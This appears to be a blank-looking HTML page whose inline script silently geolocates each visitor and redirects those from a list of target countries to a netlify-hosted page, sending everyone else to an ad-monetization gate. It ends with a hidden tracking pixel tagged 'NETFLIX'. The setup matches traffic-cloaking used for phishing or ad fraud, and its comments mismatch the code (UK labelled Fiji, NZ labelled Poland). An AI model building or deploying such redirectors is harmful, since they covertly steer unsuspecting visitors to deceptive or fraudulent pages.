<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tu Título</title>
</head>
<body>
    <script>
        let countryHack = ['MX', 'GR', 'HU', 'HR', 'RS', 'GT', 'AU', 'NZ']; // Paises objetivo
        let urlPromocion = 'https://www.highcpmrevenuegate.com/x293k2w3xc?key=c756c8fb361df5df079ee02588e59baa';
        let country;

        fetch('https://get.geojs.io/v1/ip/country')
            .then((response) => response.text())
            .then((data) => {
                country = data.trim();
                if (countryHack.includes(country)) {
                    redirectURL(country);
                } else {
                    // Redirige a una URL de respaldo si el país no está en la lista
                    window.location.href = urlPromocion;
                }
            });

function redirectURL(country) {
    // Agrega lógica personalizada para redirigir según el país aquí
    if (country === 'MX') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/';
    } else if (country === 'GR') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/';
    } else if (country === 'HU') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/';
    } else if (country === 'RS') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/';
    } else if (country === 'HR') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/';
    } else if (country === 'UK') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/'; // Agrega URL para Fiji
    } else if (country === 'NZ') {
        window.location.href = 'https://relaxed-horse-4e1284.netlify.app/'; // Agrega URL para Polonia
    } else {
        // Si no se especifica un redireccionamiento para un país específico,
        // redirige al scriptHack o a otra URL de respaldo
        window.location.href = urlPromocion;
    }
}
    </script>
</body>
</html>

<body><img src="//whos.amung.us/pingjs/?k=godhelpme&amp;t=NETFLIX &amp;x=https://cloud.digitalocean.com/" style="display:none">
